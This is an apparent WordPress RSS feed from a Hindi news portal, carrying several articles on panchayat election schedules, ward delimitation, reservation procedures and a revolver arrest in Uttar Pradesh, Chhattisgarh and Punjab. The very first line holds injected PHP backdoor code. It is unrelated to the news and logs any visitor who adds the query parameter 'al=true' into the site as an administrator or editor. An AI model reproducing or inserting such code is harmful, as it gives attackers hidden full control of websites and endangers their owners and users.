// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Panchayat elections – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Sun, 27 Jul 2025 14:16:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 अलीगढ़ में पंचायत चुनाव का बिगुल, 852 प्रधान समेत 2,000 से ज्यादा पदों पर वोटिंग https://pratyushaashakinayikiran.com/?p=173702 Sun, 27 Jul 2025 14:16:00 +0000 https://pratyushaashakinayikiran.com/?p=173702 अलीगढ़
 जिले में इस बार 852 ग्राम प्रधान, 1142 क्षेत्र पंचायत सदस्य (बीडीसी) व 46 जिला पंचायत सदस्य के पदों पर आगामी पंचायत चुनाव होगा। पंचायती राज विभाग ने शनिवार को अनंतिम परिसीमन जारी कर दिया है। पिछले वर्ष के मुकाबले जिले में इस बार 14 बीडीसी के पद कम हुए हैं। इसमें लोधा, धनीपुर, चंडौस व टप्पल प्रभावित हुए हैं। इसी तरह लोधा ब्लाक में एक जिला पंचायत सदस्य का पद कम हुआ है।

टप्पल ब्लाक में इस बार एक पंचायत की बढ़ोतरी हुई है। अब लोगों के पास अनंतिम प्रकाशन पर 29 जुलाई से लेकर दो अगस्त तक आपत्ति दर्ज कराने का मौका है। इसके बाद आपत्तियों का निस्तारण होगा। छह से 10 अगस्त तक अंतिम सूची जारी होगी। बीडीसी पद के लिए ब्लाक कार्यालय व जिला पंचायत सदस्य के लिए जिला पंचायत के अपर मुख्य अधिकारी के कार्यालय में आपत्ति दर्ज कराई जा सकती हैं।

पंचायती राज विभाग ने पंचायत चुनाव के लिए अंततिम परिसीमन किया जारी

पिछले दिनों शासन स्तरीय पंचायत चुनाव के लिए वार्ड निर्धारित के लिए आदेश जारी किया गया था। इसमें पंचायती राज विभाग की ओर से 18 से 22 जुलाई तक वार्डों का निर्धारण किया गया। अब शनिवार को इस निर्धारण की अनंतिम सूची का प्रकाशन कर दिया।

इस सूची के अनुसार 2021 में अंतिम बार त्रिस्तरीय पंचायत चुनाव हुए थे। इसमें जिले के 12 ब्लॉक में कुल 867 ग्राम पंचायतों में चुनाव कराए गए, लेकिन कुछ समय बाद 16 ग्राम पंचायतों को नगरीय निकायों के विस्तारीकरण में शामिल कर दिया।

29 जुलाई से लेकर दो अगस्त तक दावे-आपत्ति दर्ज कराने का है अब मौका

ऐसे में कुल पंचायतों की संख्चा 851 हो गई। पूर्व की वर्षों में नगर पंचायत के रूप में तब्दील हुईं टप्पल को भी कुछ समय बाद ग्राम पंचायत बना दिया गया। ऐसे में अब फिलहाल जिले में 852 ग्राम पंचायत हैं। इसी तरह पिछले चुनाव में जिले में बीडीसी के कुल 1156 वार्ड थे, लेकिन इस बार यह 1142 ही रह गए हैं। लोधा, धनीपुर व चंडौस ब्लाक में क्षेत्र पंचायत सदस्यों के पदों में कमी आएगी।

टप्पल ब्लॉक में बढ़ोतरी की गई। इसी तरह लोधा ब्लॉक में जिला पंचायत सदस्य का एक पद कम हो गया है। ऐसे में इस बार महज 46 जिला पंचायत सदस्यों के पदों पर चुनाव होगा।

इस तरह रहेगा आगे का कार्यक्रम

    29 जुलाई से दो अगस्त 2025 तक प्रस्तावों पर आपत्तियां प्राप्त की जाएंगी।
    तीन अगस्त से पांच अगस्त 2025 तक प्राप्त आपत्तियों का निस्तारण किया जाएगा।
    छह अगस्त से 10 अगस्त 2025 तक निर्वाचन क्षेत्रों की अंतिम सूची का प्रकाशन किया जाएगा।

इस तरह आएगा बदलाव

    पद,                अंतिम चुनाव, आगामी चुनाव
    प्रधान,                    867,             852
    बीडीसी,                 1156,          1142
    जिला पंचायत सदस्य, 47,                46

    पंचायत चुनाव के वार्ड निर्धारण के बाद परिसीमन का अतंतिम प्रकाशन कर दिया गया है। अब लोग इस पर दावे-आपत्ति दर्ज करा सकते हैं। इसके बाद अंतिम प्रकाशन होगा। यतेंद्र कुमार, जिला पंचायती राज अधिकारी

]]>
यूपी पंचायत चुनाव को लेकर निर्वाचन नामावली का अंतिम प्रकाशन 15 जनवरी 2026 को होगा https://pratyushaashakinayikiran.com/?p=170009 Sat, 12 Jul 2025 11:46:00 +0000 https://pratyushaashakinayikiran.com/?p=170009 लखनऊ

उत्तर प्रदेश में त्रिस्तरीय पंचायत चुनाव को लेकर बड़ी अपडेट सामने आई है. राज्य निर्वाचन आयोग ने मतदाता सूची के अंतिम प्रकाशन की अधिसूचना जारी कर दी है. 18 जुलाई 2025 से पंचायत चुनाव की तैयारियां औपचारिक रूप से शुरू होंगी. निर्वाचन नामावली का अंतिम प्रकाशन 15 जनवरी 2026 को होगा. इसके बाद मार्च 2026 में पंचायत चुनाव का महासंग्राम होगा.

इस बीच चुनाव प्रक्रिया को पारदर्शी और निष्पक्ष बनाने के उद्देश्य से अधिकारियों के तबादलों पर फिलहाल रोक लगा दी गई है. OSD राज्य निर्वाचन आयोग, IAS डॉ. अखिलेश मिश्रा ने इस संबंध में सभी ज़िलाधिकारियों को पत्र भेजकर निर्देशित किया है. उत्तर प्रदेश में एक बार फिर से पंचायत चुनावों की सरगर्मी तेज हो गई है.

वोटर लिस्ट में संशोधन का कार्य हो चुका है शुरू

जून 2025 से वोटर लिस्ट में संशोधन का कार्य शुरू हो चुका है. जिसमें मृतकों के नाम हटाने और नए मतदाताओं को जोड़ने का काम होगा. इसके साथ ही बूथ लेवल ऑफिसर (बीएलओ) और पर्यवेक्षकों की नियुक्ति की प्रक्रिया भी शुरू हो चुकी है. यह चुनाव ग्राम प्रधानों, क्षेत्र पंचायत सदस्यों, और जिला पंचायत अध्यक्षों के चयन के लिए महत्वपूर्ण हैं

नए परिसीमन के तहत यूपी में 512 ग्राम पंचायतें हुईं कम

यूपी पंचायत चुनाव को 2027 के विधानसभा चुनाव से पहले 'सेमीफाइनल' के रूप में देखा जा रहा है. उत्तर प्रदेश में 57,695 ग्राम पंचायतों, 826 ब्लॉकों और 75 जिला पंचायतों में होने वाले ये चुनाव राजनीतिक दलों के लिए महत्वपूर्ण माने जा रहे हैं. हाल ही में पंचायती राज विभाग ने ग्राम पंचायतों के पुनर्गठन का कार्य पूरा किया है, जिसके तहत 512 ग्राम पंचायतें कम कर दी गई हैं, अब कुल 57,694 ग्राम पंचायतों में चुनाव होंगे. नए परिसीमन में प्रदेश के तीन जिलों में सबसे ज्यादा ग्राम पंचायतें कम हुई हैं, जो चित्रकूट, आजमगढ़ और देवरिया हैं. 

 अगले साल यानी 2026 में यूपी पंचायत चुनाव होने हैं। इसके लिए उत्तर प्रदेश में त्रिस्तरीय पंचायत चुनाव की मतदाता सूची के अंतिम प्रकाशन की अधिसूचना जारी कर दी गई है। मतदाता पुनरीक्षण का कार्य 18 जुलाई से शुरू हो जाएगा। अंतिम मतदाता सूची 15 जनवरी 2026 को जारी की जाएगी। मार्च-अप्रैल 2026 तक पंचायत चुनाव कराए जाएंगे।

राज्य निर्वाचन आयोग ने अगले साल की पहली तिमाही में पंचायत चुनाव कराने की तैयारियां शुरू कर दी हैं। इसके पहले चरण में वोटर लिस्ट के व्यापक पुनरीक्षण का कार्यक्रम तय कर दिया गया है। 18 जुलाई से इसकी प्रक्रिया शुरू होगी। 14 अगस्त से बूथ लेवल ऑफिसर (BLO) घर-घर पहुंचकर सर्वे करेंगे और अर्ह लोगों को वोटर बनाएंगे। राज्य निर्वाचन आयुक्त आरपी सिंह ने  इसकी अधिसूचना जारी कर दी है।
पुनरीक्षण अभियान की शुरुआत ग्राम पंचायत के किसी हिस्से या पूरी ग्राम पंचायत के शहरी निकाय में शामिल होने की स्थिति में वहां की वोटर लिस्ट डिलीट करने से होगी। साथ ही BLO और पर्यवेक्षकों को इस अवधि में उनके कार्यक्षेत्र का आवंटन भी किया जाएगा। 1 जनवरी, 2026 को 18 साल की उम्र पूरी करने वाले युवा भी वोटर लिस्ट में नाम शामिल करने के लिए आवेदन कर सकेंगे।

मतदाता सूची पुनरीक्षण अभियान के दौरान छुट्टियों के दिन भी दफ्तर खुलेंगे। किसी भी स्थिति में अभियान की समय-सीमा नहीं बढ़ाई जाएगी। आयोग की वेबसाइट https://sec.up.nic.in/OnlineVoters/ के जरिए वोटर लिस्ट में नाम शामिल कराने के लिए ऑनलाइन आवेदन भी किया जा सकेगा। BLO इन आवेदनों के आधार पर भी आवेदक के घर जाकर दस्तावेजों की जांच करेंगे और उसके आधार पर वोटर लिस्ट में नाम दर्ज किया जाएगा।

कब क्या होगा?

    18 जुलाई-13 अगस्त : बीएलओ को कार्यक्षेत्र का आवंटन
    14 अगस्त-29 सितंबर : घर-घर सर्वे, अर्ह वोटरों का नाम जोड़ना
    14 अगस्त-22 सितंबर : ऑनलाइन आवेदन की अवधि
    23 सितंबर-29 सितंबर : ऑनलाइन आवेदनों की घर जाकर जांच
    30 सितंबर -24 नवंबर : वोटर लिस्ट की डिजिटल कॉपी तैयार करना
    25 नवंबर-04 दिसंबर : बूथों की नंबरिंग, मैपिंग
    05 दिसंबर : वोटर लिस्ट का ड्राफ्ट जारी होगा
    6-12 दिसंबर : दावे व आपत्तियां प्राप्त करना
    13-19 दिसंबर : दावों व आपत्तियों का समाधान
    15 जनवरी : फाइनल वोटर लिस्ट का प्रकाशन

]]>
छत्तीसगढ़-त्रि-स्तरीय पंचायत चुनाव की बीजेपी ने बनाई प्रांतीय टीम, सौरभ सिंह संयोजक सहित सदस्य झोकेंगे ताकत https://pratyushaashakinayikiran.com/?p=121151 Tue, 14 Jan 2025 15:15:00 +0000 https://pratyushaashakinayikiran.com/?p=121151 रायपुर।

छत्तीसगढ़ बीजेपी ने त्रि-स्तरीय पंचायत चुनाव 2025 को लेकर अपने प्रांतीय टीम की घोषणा की है। प्रदेश अध्यक्ष किरण सिंह देव और प्रदेश संगठन महामंत्री पवन साय की सहमति से प्रांतीय टीम का एलान किया गया है। इस 19 सदस्यीय टीम में सौरभ सिंह को संयोजक बनाया गया है। बाकि के 18 नेताओं को सदस्य बनाया गया है।

बीजेपी नगरीय निकाय और त्रि-स्तरीय पंचायत चुनावों को लेकर विभिन्न स्तरों पर समितियों का गठन कर रही है। नगरीय निकाय चुनाव के लिए प्रदेश, संभाग, जिला समितियों व निकायों के लिए प्रभारियों की घोषणा के बाद सोमवार को त्रि-स्तरीय पंचायत चुनाव को लेकर  प्रदेश अध्यक्ष किरण सिंह देव एवं प्रदेश संगठन महामंत्री पवन साय की सहमति से प्रांतीय टीम की घोषणा की गई। पंचायत चुनावों के लिए जिला प्रभारियों की घोषणा पहले ही की जा चुकी है। पंचायत चुनावों के लिए घोषित प्रदेश समिति के संयोजक सौरभ सिंह बनाए गए हैं। 19 सदस्यीय समिति में भरत लाल वर्मा, जगन्नाथ पाणिग्राही, राजा पांडेय, अखिलेश सोनी, नीलकण्ठ टेकाम, निरंजन सिन्हा, ललित चन्द्राकर, श्रीमती शालिनी राजपूत, आशाराम नेताम, अलका चन्द्राकर, सतीश लाटिया, रामकुमार भट्ट, दीपक म्हस्के, डॉ. किरण बघेल, वैभव बैस, अनुराग अग्रवाल, सुनील पिल्लई, आकाश विग को समिति का सदस्य बनाया गया है।

]]>
छत्तीसगढ़-त्रि-स्तरीय पंचायत चुनाव का आरक्षण कार्यक्रम घोषित, 28 से होगी जिला पंचायत सदस्य की रिजर्वेशन प्रक्रिया https://pratyushaashakinayikiran.com/?p=113611 Wed, 25 Dec 2024 12:46:00 +0000 https://pratyushaashakinayikiran.com/?p=113611 रायपुर।

छत्तीसगढ़ में त्रि-स्तरीय पंचायत चुनाव के लिये शासन-प्रशासन ने पूरी तरह से कमर कस ली है। त्रिस्तरीय पंचायत निर्वाचन वर्ष 2024-25 के लिये आरक्षण की कार्यवाही को लेकर पंचायत एवं ग्रामीण विकास विभाग ने समय सारणी घोषित कर दी है।

समय-सारणी के मुताबिक, 28 दिसम्बर से 29 दिसम्बर तक जिला पंचायत सदस्य, जनपद अध्यक्ष, जनपद सदस्य, सरपंच एवं पंच पद के प्रवर्गवार आरक्षण की कार्यवाही होगी । अधिसूचना का प्रकाशन संबंधित जिलों के कलेक्टर्स करेंगे। इस संबंध में आरक्षण की कार्यवाही के लिये सूचना का प्रकाशन 23 दिसम्बर को संबंधित जिलों के कलेक्टर्स की ओर से हो चुका है। आरक्षण की कार्यवाही पूर्ण कर 29 दिसम्बर को कलेक्टर्स की ओर से पंचायत एवं ग्रामीण विकास को जानकारी भेजी जायेगी।

रायपुर के निमोरा में 30 दिसम्बर को होगा जिला पंचायत के अध्यक्षों का आरक्षण
राज्य के 33 जिला पंचायतों के अध्यक्ष पदों के प्रवर्गवार आरक्षण एवं प्रवर्गवार महिलाओं के स्थानों का आरक्षण 30 दिसम्बर को होगा। आरक्षण की यह कार्यवाही संचालक पंचायत की ओर से सुबह 10 बजे से ठाकुर प्यारेलाल पंचायत एवं ग्रामीण विकास संस्थान निमोरा में की जाएगी। जिला पंचायत अध्यक्ष के आरक्षण की आम सूचना का प्रकाशन संचालक पंचायत की ओर से  23 दिसम्बर को किया गया है। संचालक पंचायत की ओर से आरक्षण की कार्यवाही की जानकारी 30 दिसम्बर को पंचायत एवं ग्रामीण विकास विभाग देगा।

प्रवर्गवार आरक्षण की कार्यवाही 29 दिसंबर को
रायपुर जनपद पंचायत के सदस्य पदों के लिए प्रवर्गवार एवं महिलाओं के प्रवर्गवार स्थानों के आरक्षण एवं आवंटन की कार्यवाही जिले के चारों ब्लॉक के जनपद कार्यालयों में 29 दिसंबर को सुबह 11 बजे से होगी। इस संबंध में कलेक्टर डॉ. गौरव सिंह ने आम सूचना जारी कर दी है।

रायपुर के चार तहसीलों में होगी आरक्षण की कार्यवाही
जनपद पंचायत के सदस्य पदों के लिए प्रवर्गवार एवं महिलाओं के प्रवर्गवार स्थानों के आवंटन एवं आरक्षण की कार्यवाही की जाएगी। जनपद सदस्यों के लिए आरक्षण और आवंटन की कार्रवाई धरसींवा के जनपद कार्यालय, तिल्दा-नेवरा के जनपद कार्यालय, अभनपुर के जनपद कार्यालय एवं आरंग के जनपद कार्यालय में आयोजित की गई है।

पंच पदों के लिए प्रवर्गवार आरक्षण की कार्रवाई 28 दिसंबर को
त्रिस्तरीय पंचायत निर्वाचन के पंच पदों के लिए  विभिन्न स्थानों के आरक्षण की  कार्यवाही  28 दिसंबर को सुबह 11 बजे सभी ब्लॉकों के जनपद कार्यालय में आयोजित की गई है। इस दौरान पंच पदों के लिए प्रवर्गवार एवं महिलाओं के लिए प्रवर्गवार स्थानों के आवंटन एवं आरक्षण की कार्यवाही होगी। रायपुर जिले की सभी पंचायत के पंच पदों के प्रवर्गवार एवं महिलाओं के प्रवर्गवार स्थानों के आबंटन एवं आरक्षण के लिए नियमानुसार कार्यवाही धरसींवा के जनपद पंचायत कार्यालय, तिल्दा-नेवरा के जनपद पंचायत कार्यालय, अभनपुर के जनपद पंचायत कार्यालय एवं आरंग के जनपद पंचायत कार्यालय में होगी।

जनपद पंचायत अध्यक्ष पद के प्रवर्गवार आरक्षण 29 दिसंबर को
 जनपद अध्यक्ष पदों के लिए प्रवर्गवार एवं महिलाओं के प्रवर्गवार स्थानों के आरक्षण एवं आवंन की कार्रवाई कलेक्टोरेट परिसर स्थित रेडक्रॉस सोसायटी सभा कक्ष में 29 दिसंबर को सुबह 11 बजे से होगी।

]]>
छत्तीसगढ़-नगरीय निकाय और पंचायत चुनाव की जल्द होगी घोषणा, 21 दिसंबर से लगेगी आचार संहिता! https://pratyushaashakinayikiran.com/?p=108973 Thu, 12 Dec 2024 13:25:00 +0000 https://pratyushaashakinayikiran.com/?p=108973 रायपुर.

रायपुर दक्षिण विधानसभा सीट पर उपचुनाव के बाद अब छत्तीसगढ़ में जल्द ही नगरीय निकाय और पंचायत चुनाव की घोषणा हो सकती है। चुनाव का एलान कभी भी हो सकता है। इसे लेकर निर्वाचन आयोग की तरफ से पूरी तैयारी कर ली गई है। सब कुछ ठीक रहा तो 21 दिसंबर या उससे पहले ही प्रदेश में आदर्श आचार संहिता लागू हो सकती है।

सियासी गलियार में इस बात की खूब चर्चा है कि प्रदेश में नगरीय निकाय और पंचायत चुनाव जनवरी और फरवरी में कराये जा सकते है। नगरीय निकाय चुनाव जनवरी तक और पंचायत चुनाव की प्रक्रिया फरवरी के पहले हफ्ते तक पूरी हो सकती है। सूत्रो से मिली जानकारी के मुताबिक, विधानसभा के शीत सत्र के ठीक बाद 21 दिसंबर को राज्य में आदर्श चुनाव आचार संहिता लग सकती है। विधानसभा का शीतकालीन सत्र 16 से 20 दिसंबर तक लगेंगे। ऐसे में 21 दिसंबर तक नगरीय निकाय और पंचायत चुनाव की तारीख तारीखें घोषित हो सकती हैं। पांच से छह चरणों में नगरीय निकाय और पंचायत चुनाव कराए के संकेत मिल रहे हैं। नगरीय निकाय चुनाव के लिये जनवरी में वोटिंग कराये जाएंगे। चुनाव प्रक्रिया जनवरी से शुरू हो सकती है। फरवरी के पहले या दूसरे हफ्ते तक पंचायत चुनाव की प्रक्रिया भी पूरी हो सकती है।

फैक्ट फाइल:
0- प्रदेश में कुल 14 नगर निगम
0- कुल 52 नगर पालिका परिषद
0- कुल 123 नगर पंचायत

वर्तमान में प्रदेश में 14 नगर निगम, 52 नगर पालिका परिषद और 123 नगर पंचायत हैं। प्रदेश में नगरीय निकाय और पंचायत चुनाव के लिए आरक्षण रोस्टर को भी लागू किया जाना है। नए रोस्टर के मुताबिक लॉटरी के जरिए निकाय में आरक्षण की व्यवस्था रहेगी। पंचायत चुनाव के लिए मतदाता सूची का अंतिम प्रकाशन 14 सितंबर तक हो जाएगा । 15 दिसंबर तक आरक्षण की प्रक्रिया पूरी करनी होगी। इसके बाद कभी भी आचार संहिता लग सकती है।

]]>
पंचायत चुनाव के लिए फार्म लेने गए व्यक्ति ने कर दिया कांड, पुलिस ने रिवाल्वर जब्त कर व्यक्ति को गिरफ्तार कर लिया https://pratyushaashakinayikiran.com/?p=79294 Thu, 03 Oct 2024 19:30:00 +0000 https://pratyushaashakinayikiran.com/?p=79294 फिल्लौर (भाखड़ी)
सरपंच अभी बना नहीं, सरपंची के फार्म लेने आए व्यक्ति में इतना जोश आ गया कि मामूली सी बात पर रिवाल्वर निकाल कर दूसरे को धमकाने लग पड़ा। पुलिस ने रिवाल्वर जब्त कर व्यक्ति को गिरफ्तार कर लिया। प्राप्त सूचना के अनुसार चुनाव आयोग द्वारा गांव में होने वाले पंचों-सरपंचों के चुनावों की घोषणा के बाद स्थानीय बी.डी.पी.ओ. कार्यालय के बाहर फार्म लेने वाले उम्मीदवार काफिलों की शक्ल में गांवों से आ रहे हैं। लोगों में चुनावों को लेकर उत्साह के चलते शहर की प्रमुख नवांशहर रोड जहां तहसील कॉम्प्लैक्स, एस.डी.एम. कर्यालय के साथ डी.एस.पी. का दफ्तर भी है वहां प्रातः से लेकर शाम 6 बजे तक जाम लगा रहता है। जाम खुलवाने को लेकर पुलिस को भारी मुशक्कत करनी पड़ रही है।

दोपहर बाद बी.डी.पी.ओ. कार्यालय के बाहर माहौल उस वक्त तनावपूर्ण हो गया जब सरपंची का फार्म लेने आया गांव लोहगढ़ का एक उम्मीदवार गुरजीत सिंह जो अपनी कार में परिवार के साथ आया था वह बिना किसी की प्रवाह किए कार को मेन रोड के बीच ही खड़ा कर फार्म लेने अंदर चला गया जिसके चलते वहां जाम लग गया। जाम समाप्त करने के लिए गांव सैफाबाद के अशोक कुमार जोकि वह भी सरपंची का फार्म लेने आए थे उन्होंने कार में बैठी महिला से आग्रह किया की वह उनकी कार को एक तरफ कर देते हैं जिससे जाम समाप्त हो जाएगा।

जैसे ही अशोक कुमार ने गाड़ी को एक तरफ साइड पर खड़ा किया तभी गुरजीत सिंह भी वहां पर पहुंच गया। अपनी कार को सड़क के बीच से हटाने को लेकर गुरजीत सिंह इस कदर खफा हो गया कि उसने रिवाल्वर निकाल अशोक कुमार को धमकाते हुए कहा कि उसकी कार में एक ओर रिवाल्वर पड़ी थी वह हर वक्त अपने पास दो रिवाल्वर रखता है उसकी हिम्मत कैसे पड़ गई उसकी कार कोई साइड पर करने की। उसने उसकी कार में से जो दूसरी रिवाल्वर चोरी कर ली है वह उसे अभी वापस करे नहीं तो उसके अंजाम बुरे भुगतने पड़ेगे।

व्यक्ति के हाथ में रिवाल्वर देख वहां माहौल तनावपूर्ण बन गया। अशोक कुमार ने उससे कहा कि उसने केवल साइड कार में की है वह उसकी तलाशी ले सकता है। उसने उसकी कोई रिवाल्वर चोरी नहीं की। तभी वहां पर पहुंचे थाना प्रभारी इंस्पैक्टर सुखदेव सिंह और उनकी पुलिस पार्टी ने उक्त व्यक्ति को दबोच उसके हाथ से रिवाल्वर पकड़ उसे थाने ले गए। थाना प्रभारी ने बताया कि चुनाव अचार संहिता लगने के कारण उक्त व्यक्ति ने डिप्टी कमिश्नर के कानून की उल्लंघना की है जिसके अंतर्गत गुरजीत सिंह पर मुकदद्दमा दर्ज कर उसे गिरफ्तार कर लिया गया है।

उन्होंने लोगों से अपील करते हुए कहा जिस किसी के पास भी लाइसैंसी हथियार है वह जमां करवा दे। उक्त घटना के बाद उक्त व्यक्ति की सोशल मीडिया पर खूब वीडियो वायरल हो रही है। सरपंच बना नहीं पहले ही रिवाल्वर निकाल धौंस जमाने लग पड़ा अगर सरपंच बन जाता तो न जाने क्या कर देता।

]]>
प्रेस कॉन्फ्रैंस दौरान राज कमल चौधरी राज्य आयोग कमिशन ने पंचायती चुनाव का ऐलान किया, 15 अक्तूबर को होंगे https://pratyushaashakinayikiran.com/?p=75314 Wed, 25 Sep 2024 21:07:00 +0000 https://pratyushaashakinayikiran.com/?p=75314 पंजाब
पंजाब में ग्राम पंचायती चुनाव से जुड़ी बड़ी खबर आई है। बता दें कि गांवों में जिस दिन पंचायती चुनाव होते हैं उसी दिन शाम तक इनका नतीजा भी घोषित कर दिया जाता है। पंजाब में पंचायती चुनाव का आज ऐलान हो गया है। प्रेस कॉन्फ्रैंस दौरान राज कमल चौधरी राज्य आयोग कमिशन ने पंचायती चुनाव का ऐलान कर दिया है।

पंजाब में त्योहारों व धान की कटाई को ध्यान में रखते हुए ग्राम पंचायती चुनाव  शैड्यूल तैयार किया गया है। उन्होंने कहा कि 15 अक्तूबर 2024 को पंचायती चुनाव होंगे, जिसके नोमिनेशन 27 सितंबर से 4 अक्तूबर तक होगी और 7 अक्तूबर को नोमिनेशन वापस लिया जा सकता है। बता दें नोमिनेशन का समय सुबह 11 बजे से दोपहर 3 बजे तक का होगा। 15 अक्तूबर को चुनाव होंगे, इस दौरान पोलिंग का समय सुबह 8 बजे से लेकर शाम 4 बजे तक होगा इसके बाद नतीजा घोषित होगा।

राज्य आयोग कमिशन ने जानकारी देते हुए बताया कि इस बार ग्राम पंचायत चुनाव बैलेट बाक्स के जरिए की करवाए जाएंगे, नोटा की तरफ से बैलेट पेपर ऑप्शन रखी गई है।  बैलेट पेपर 2 तरह के होंगे, जिसमें सरपंचो के लिए गुलाबी (Pink) व पंचो के लिए सफेद (White)पेपर होगा। उन्होंने कहा कि चुनाव के सिंबल की लिस्ट जिले के डीसी को भेज दी गई है, सरपंचों व पंचों के लिए अलग-अलग सिंबल बनाए गए हैं। सरपंचो के लिए 38 सिंबल और पंचों के लिए 70 सिंबल होंगे। चुनावों में सरपंचों के लिए 40 हजार व पंचों के लिए 30 हजार खर्ते की लिमिट है। इसके साथ ही नॉमिनेशन के लिए 100 रुपए फीस व एसी/बीसी को 50 रुपए देनी होगी। सर्व सम्मति से सरपंच चुनने वाले गांव में कोड ऑफ कंडक्ट नहीं लगेगा। गौरतलब है कि ग्राम पंचायती चुनाव की सूची अलग होती है, पंजाब में 13,237 ग्राम पंचायतें 19110 पोलिंग बूथ बनेंगे, मतदाता 1 करोड़ 33 लाख 97 हजार 932 हैं।

]]>